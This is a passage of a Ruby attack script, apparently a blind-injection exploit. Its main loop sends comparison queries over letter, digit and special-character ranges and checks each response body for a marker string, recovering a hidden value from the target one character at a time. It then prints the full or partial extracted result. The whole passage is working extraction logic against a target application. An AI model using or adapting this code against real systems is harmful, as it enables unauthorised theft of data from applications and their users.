cmoreless("<=", "I", "no") 921 | if $response.body.include?($search) || $fheader == "y" 922 | for ch in $arr11 923 | cmoreless("=", ch, "yes") 924 | if $letter == 1 925 | break 926 | end 927 | end 928 | else 929 | for ch in $arr12 930 | cmoreless("=", ch, "yes") 931 | if $letter == 1 932 | break 933 | end 934 | end 935 | end 936 | end 937 | else 938 | cmoreless("<=", "S", "no") 939 | if $response.body.include?($search) || $fheader == "y" 940 | cmoreless("<=", "P", "no") 941 | if $response.body.include?($search) || $fheader == "y" 942 | for ch in $arr13 943 | cmoreless("=", ch, "yes") 944 | if $letter == 1 945 | break 946 | end 947 | end 948 | else 949 | for ch in $arr14 950 | cmoreless("=", ch, "yes") 951 | if $letter == 1 952 | break 953 | end 954 | end 955 | end 956 | else 957 | cmoreless("<=", "V", "no") 958 | if $response.body.include?($search) || $fheader == "y" 959 | for ch in $arr15 960 | cmoreless("=", ch, "yes") 961 | if $letter == 1 962 | break 963 | end 964 | end 965 | else 966 | for ch in $arr16 967 | cmoreless("=", ch, "yes") 968 | if $letter == 1 969 | break 970 | end 971 | end 972 | end 973 | end 974 | end 975 | end 976 | end 977 | 978 | # numeric 979 | if $letter == 0 980 | cmoreless(">=", "0", "no") 981 | if $response.body.include?($search) || $fheader == "y" 982 | cmoreless("<=", "4", "no") 983 | if $response.body.include?($search) || $fheader == "y" 984 | for ch in $arrn1 985 | cmoreless("=", ch, "yes") 986 | if $letter == 1 987 | break 988 | end 989 | end 990 | else 991 | for ch in $arrn2 992 | cmoreless("=", ch, "yes") 993 | if $letter == 1 994 | break 995 | end 996 | end 997 | end 998 | end 999 | end 1000 | 1001 | # special character 1002 | if $letter == 0 1003 | for ch in $arrs 1004 | cmoreless("=", ch, "yes") 1005 | if $letter == 1 1006 | break 1007 | end 1008 | end 1009 | end 1010 | end 1011 | 1012 | # printing results 1013 | if $letter == 0 1014 | if $result == "" 1015 | puts "[-] No results. Probably wrong pattern." 1016 | break 1017 | else 1018 | puts "\n[+] Full result:\n" + $result 1019 | break 1020 | end 1021 | end 1022 | end 1023 | 1024 | # means that there are still chars to enumerate 1025 | if $letter == 1 1026 | puts "\n[-] Retreving not finished:\n" + $result 1027 | end 1028 | --------------------------------------------------------------------------------